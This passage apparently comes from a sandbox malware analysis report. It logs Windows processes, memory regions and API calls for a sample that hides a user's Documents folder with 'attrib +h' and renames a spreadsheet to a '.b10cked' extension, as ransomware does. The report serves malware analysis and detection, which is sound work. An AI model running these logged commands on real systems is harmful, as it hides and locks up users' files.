11377 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11378 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 11379 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11380 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11381 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000020000" filename = "" Region: id = 11382 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11383 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 11384 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 11385 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 11386 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11387 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11388 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11389 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11390 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11391 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point 
= 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11392 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11393 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11394 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11395 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11396 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11397 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 11398 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11399 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 153 os_tid = 0xc4 Process: id = "97" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea168c0" os_pid = "0x46c" 
os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "94" os_parent_pid = "0x8d4" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11452 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11453 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11454 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11455 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 11456 start_va = 0xa00000 end_va = 0xa06fff entry_point = 0xa00000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 11457 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11458 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11459 start_va = 0x7ffb0000 end_va = 0x7ffd2fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11460 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 11461 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11462 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11463 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11464 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11465 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 11466 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 11467 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 11468 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11469 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11470 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 
region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11471 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11472 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11473 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11474 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11475 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11476 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11477 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11478 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11479 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name 
= "pagefile_0x0000000000110000" filename = "" Region: id = 11480 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11481 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 154 os_tid = 0x4b0 Process: id = "98" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168e0" os_pid = "0x53c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11558 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11559 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11560 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11561 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename 
= "" Region: id = 11562 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11563 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11564 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11565 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11566 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 11567 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11670 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11671 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11672 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 11673 start_va = 0x270000 end_va = 0x2d6fff entry_point = 0x270000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11674 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 11675 
start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 11676 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11677 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11678 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11679 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11680 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11681 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11682 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11683 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11684 start_va = 
0x2e0000 end_va = 0x3a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 11685 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11686 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11687 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 11688 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 11689 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 11690 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 11691 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 11692 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 11693 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Thread: id = 155 os_tid = 0x4e4 [0130.703] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fdf4 | out: lpSystemTimeAsFileTime=0x26fdf4*(dwLowDateTime=0x87d5f600, dwHighDateTime=0x1d440a9)) [0130.703] GetCurrentProcessId () returned 0x53c [0130.703] GetCurrentThreadId () returned 0x4e4 [0130.704] GetTickCount () returned 0x29b73 [0130.704] 
QueryPerformanceCounter (in: lpPerformanceCount=0x26fdec | out: lpPerformanceCount=0x26fdec*=18749275970) returned 1 [0130.704] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0130.704] __set_app_type (_Type=0x1) [0130.704] __p__fmode () returned 0x76b331f4 [0130.704] __p__commode () returned 0x76b331fc [0130.704] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0130.704] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0130.704] GetCurrentThreadId () returned 0x4e4 [0130.704] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x4e4) returned 0x38 [0130.705] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0130.705] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0130.705] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.705] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.705] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fd84 | out: phkResult=0x26fd84*=0x0) returned 0x2 [0130.705] VirtualQuery (in: lpAddress=0x26fdbb, lpBuffer=0x26fd54, dwLength=0x1c | out: lpBuffer=0x26fd54*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.705] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fd54, dwLength=0x1c | out: lpBuffer=0x26fd54*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0130.705] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fd54, dwLength=0x1c | out: lpBuffer=0x26fd54*(BaseAddress=0x171000, AllocationBase=0x170000, 
AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0130.705] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fd54, dwLength=0x1c | out: lpBuffer=0x26fd54*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.705] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fd54, dwLength=0x1c | out: lpBuffer=0x26fd54*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0130.705] GetConsoleOutputCP () returned 0x1b5 [0130.705] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.705] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0130.705] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.705] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0130.705] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.705] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0130.706] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.706] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0130.706] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.706] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0130.706] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.706] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0130.706] GetEnvironmentStringsW () returned 0x80168* [0130.706] FreeEnvironmentStringsW (penv=0x80168) returned 1 [0130.706] GetEnvironmentStringsW () returned 0x80168* [0130.706] FreeEnvironmentStringsW (penv=0x80168) returned 1 [0130.706] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ecf4 | out: phkResult=0x26ecf4*=0x40) returned 0x0 [0130.706] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x0, lpData=0x26ed00*=0x90, lpcbData=0x26ecf8*=0x1000) returned 0x2 [0130.706] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x4, lpData=0x26ed00*=0x1, lpcbData=0x26ecf8*=0x4) returned 0x0 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x0, lpData=0x26ed00*=0x1, lpcbData=0x26ecf8*=0x1000) returned 0x2 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x4, lpData=0x26ed00*=0x0, lpcbData=0x26ecf8*=0x4) returned 0x0 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x4, lpData=0x26ed00*=0x40, lpcbData=0x26ecf8*=0x4) returned 0x0 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x4, lpData=0x26ed00*=0x40, lpcbData=0x26ecf8*=0x4) returned 0x0 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x0, lpData=0x26ed00*=0x40, lpcbData=0x26ecf8*=0x1000) returned 0x2 [0130.707] RegCloseKey (hKey=0x40) returned 0x0 [0130.707] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ecf4 | out: phkResult=0x26ecf4*=0x40) returned 0x0 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, 
lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x0, lpData=0x26ed00*=0x40, lpcbData=0x26ecf8*=0x1000) returned 0x2 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x4, lpData=0x26ed00*=0x1, lpcbData=0x26ecf8*=0x4) returned 0x0 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x0, lpData=0x26ed00*=0x1, lpcbData=0x26ecf8*=0x1000) returned 0x2 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x4, lpData=0x26ed00*=0x0, lpcbData=0x26ecf8*=0x4) returned 0x0 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x4, lpData=0x26ed00*=0x9, lpcbData=0x26ecf8*=0x4) returned 0x0 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x4, lpData=0x26ed00*=0x9, lpcbData=0x26ecf8*=0x4) returned 0x0 [0130.707] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ecfc, lpData=0x26ed00, lpcbData=0x26ecf8*=0x1000 | out: lpType=0x26ecfc*=0x0, lpData=0x26ed00*=0x9, lpcbData=0x26ecf8*=0x1000) returned 0x2 [0130.707] RegCloseKey (hKey=0x40) returned 0x0 [0130.707] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886365 [0130.707] srand (_Seed=0x5b886365) [0130.707] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked\"" [0130.707] GetCommandLineW () 
returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked\"" [0130.707] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.708] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x818c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0130.708] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.708] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.708] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.708] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0130.708] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0130.708] _wcsicmp (_String1="PROMPT", 